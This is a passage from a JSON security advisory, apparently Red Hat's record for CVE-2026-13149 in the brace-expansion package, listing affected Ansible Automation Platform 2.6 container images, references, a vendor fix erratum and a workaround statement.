"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-13149"
},
{
"category": "external",
"summary": "RHBZ#2494813",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2494813"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-13149",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-13149"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-13149",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-13149"
},
{
"category": "external",
"summary": "https://github.com/juliangruber/brace-expansion/commit/c7e33ec13ac1a684c116720843ce24e208611754",
"url": "https://github.com/juliangruber/brace-expansion/commit/c7e33ec13ac1a684c116720843ce24e208611754"
},
{
"category": "external",
"summary": "https://www.npmjs.com/package/brace-expansion",
"url": "https://www.npmjs.com/package/brace-expansion"
}
],
"release_date": "2026-06-30T08:30:34.502000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T21:39:16+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50479"
},
{
"category": "workaround",
"details": "There is no practical mitigation for this vulnerability. The brace-expansion package is typically a transitive dependency pulled in via minimatch and glob, making it difficult to isolate. Users should upgrade to a fixed version of brace-expansion when one becomes available.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
